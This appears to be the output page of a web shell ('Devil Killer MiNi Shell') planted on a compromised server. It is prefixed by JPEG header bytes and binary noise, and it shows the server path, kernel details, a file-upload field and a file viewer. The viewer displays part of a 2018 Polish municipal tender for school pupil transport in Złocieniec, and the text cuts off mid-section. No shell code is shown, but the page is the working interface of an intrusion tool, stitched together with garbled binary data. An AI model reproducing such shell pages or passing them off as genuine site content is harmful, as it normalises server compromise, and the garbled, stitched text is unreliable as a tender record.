JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20181211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20181211/660075-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 660075-N-2018 z dnia 2018-12-11 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Złocieniec</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dowóz uczniów z terenu gminy Złocieniec do szkół i przedszkoli oraz dowóz uczniów niepełnosprawnych z terenu gminy Złocieniec do placówek oświatowych w roku 2019</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Złocieniec</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon"></span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Stary Rynek</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">3</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">78520 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Złocieniec</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">zachodniopomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">(094) 36 72 022</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">umig.zamowienia@zlocieniec.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax"></span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.zlocieniec.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja rządowa centralna</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.zlocieniec.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.zlocieniec.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Tak</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne">https://portal.smartpzp.pl/</span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Tak</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny">w formie papierowej</span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Miejski w Złocieńcu, ul. Stary Rynek 3, 78-520 Złocieniec</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dowóz uczniów z terenu gminy Złocieniec do szkół i przedszkoli oraz dowóz uczniów niepełnosprawnych z terenu gminy Złocieniec do placówek oświatowych w roku 2019</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">BZP.271.21.2018.DW</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest: dowóz uczniów do szkół i przedszkoli oraz dowóz uczniów niepełnosprawnych do placówek oświatowych. Zamawiający dopuszcza możliwość składania ofert częściowych Zadanie I: Dowóz uczniów z terenu gminy Złocieniec do szkół i przedszkoli w roku 2019Zadanie II: Dowóz uczniów niepełnosprawnych z terenu gminy Złocieniec do placówek oświatowych w roku 2019Zadanie częściowe nr 1 Dowóz uczniów z terenu gminy Złocieniec do szkół i przedszkoli w roku 2019Wymagania wobec przewoźnika:1)	dowóz wraz z opiekunem, którego zadaniem jest nadzór nad uczniami w czasie dowozu, wchodzenia i wychodzenia uczniów z pojazdu oraz oddanie pod opiekę uczniów pracownikowi szkoły lub przedszkola, opiekunem nie może być kierowca,2)	kierowcy posiadają wymagane przepisami prawa uprawnienia, wyposażeni są w identyfikatory oraz telefony komórkowe, 3)	pojazdy posiadają polisę OC i NNW dla wszystkich przewożonych osób, wszystkie wymagane przepisami prawa badania techniczne,4)	miejsca siedzące dla wszystkich uczniów,5)	niełączenie tras np. przewóz z Cieszyna przez Darskowo,6)	zapewnienia transportu zastępczego w razie awarii pojazdu,7)	Przewoźnik ponosi całkowitą odpowiedzialność za szkody, które wynikną z ruchu pojazdów i przewozu dzieci, przy uwzględnieniu obowiązujących zasad wynikających z obowiązku ubezpieczenia odpowiedzialności cywilnej.Zadanie częściowe nr 2 Dowóz uczniów niepełnosprawnych 1.01.2019r. - 31.12.2019r.1.	Wymagania wobec przewoźnika:1)	pojazdy dostosowane do przewozu osób niepełnosprawnych , także do przewozu dzieci na wózkach inwalidzkich, wyposażone w pasy bezpieczeństwa, foteliki, osłony przeciwsłoneczne na szybach, odśnieżane stopnie wejściowe, klimatyzację i ogrzewanie, posiadające polisę OC i NNW dla wszystkich przewożonych osób oraz wymagane przepisami prawa badania techniczne, 2)	opiekun w czasie przejazdu, który zobowiązany jest wprowadzić i wyprowadzić ucznia z pojazdu oraz przekazać uprawnionym osobom - rodzicowi ( albo upoważnionej pisemnie przez rodzica osobie) oraz pracownikowi szkoły lub ośrodka, funkcji opiekuna nie może pełnić kierowca,3)	miejsca siedzące dla wszystkich uczniów,4)	kierowcy posiadają wymagane przepisami prawa uprawnienia, wyposażeni są w identyfikatory oraz telefony komórkowe,5)	miejsca wsiadania i wysiadania oraz godziny dowozu i odwozu dowożonych uczniów należy uzgodnić z dyrektorami i rodzicami uczniów,6)	wraz z fakturą składaną po danym miesiącu, w którym miał miejsce dowóz, należy złożyć zaświadczenie dyrektora danej szkoły lub placówki, zawierające potwierdzenie realizowania dowozu uprawnionego ucznia w tym miesiącu,7)	zapewnienia transportu zastępczego w razie awarii pojazdu,8)	Przewoźnik ponosi całkowitą odpowiedzialność za szkody, które wynikną z ruchu pojazdów i przewozu dzieci, przy uwzględnieniu obowiązujących zasad wynikających z obowiązku ubezpieczenia odpowiedzialności cywilnej.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">60100000-9</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>60130000-8</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'>2019-01-01 </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2019-12-31</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">DODATKOWE WYMAGANIA ZWIĄZANE Z REALIZACJĄ PRZEDMIOTU ZAMÓWIENIA1.	Zatrudnienie na podstawie umowy o pracę przez wykonawcę lub podwykonawcę osób wykonujących czynności w trakcie realizacji zamówienia tj. kierowców pojazdów biorących udział w świadczeniu usługi.2.	Wykonawca zobowiązuje się do zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę osób tj. kierowców pojazdów biorących udział w świadczeniu usługi, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 2018 poz. 108). Ustalenie wymiaru zatrudnienia Zamawiający zostawia w gestii Wykonawcy, z tym zastrzeżeniem, że Zamawiający wymaga, aby każda zatrudniona osoba brała czynny udział przy realizacji przedmiotu zamówienia.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający uzna, że Wykonawca spełnia ten warunek, jeżeli Wykonawca posiada licencję na wykonywanie zarobkowego transportu drogowego osób zgodnie z ustawą z dnia 6 września 2001r. o transporcie drogowym . Wykonawca przez cały okres obowiązywania umowy musi posiadać aktualną licencję oraz inne wymagane prawem dokumenty, pozwolenia, certyfikaty itd. niezbędne do prawidłowej realizacji usługi. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający uzna, że Wykonawca spełnia ten warunek, jeżeli Wykonawca przedłoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej zadanie częściowe nr 1 - 200 000,00 zł, zadanie częściowe nr 2 - 50 000,00 zł</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">a) Doświadczenie zawodowe. Zamawiający uzna, że Wykonawca spełnia ten warunek, jeżeli Wykonawca wykaże, że wykonał należycie w okresie ostatnich trzech lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: minimum 1 usługę ciągłą polegającą na przewozie dzieci/uczniów o wartości łącznej nie mniejszej zadanie częściowe nr 1 - 200 000,00 zł, zadanie częściowe nr 2 - 50 000,00 złb) Potencjał techniczny. Zamawiający uzna, że Wykonawcy spełnia ten warunek, na podstawie oświadczenia Wykonawcy, że zapewni bezpieczny i niezbędny tabor do przewozu wszystkich dowożonych uczniów oraz posiada zadanie częściowe nr 1 - co najmniej 8 autobusów, zadanie częściowe nr 2 - co najmniej 3 pojazdy .  c) Kadra techniczna. Zamawiający uzna, że Wykonawca spełnia ten warunek, na podstawie oświadczenia, że dysponują wykwalifikowanym personelem z odpowiednimi uprawnieniami do realizacji zamówienia, tzn. zadanie częściowe nr 1 co najmniej 8 osobami posiadającymi prawo jazdy kat. zgodnej z obowiązującymi przepisami oraz 6 osobami pełniącymi funkcję opiekuna podczas przewozu; zadanie częściowe nr 2 co najmniej 3 osoby posiadające prawo jazdy kat. zgodnie z obowiązującymi przepisami oraz 3 osoby pełniące funkcję opiekuna podczas przewozu. W przypadku podmiotów działających wspólnie doświadczenie, potencjał techniczny, kadra techniczna podlega sumowaniu. </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span 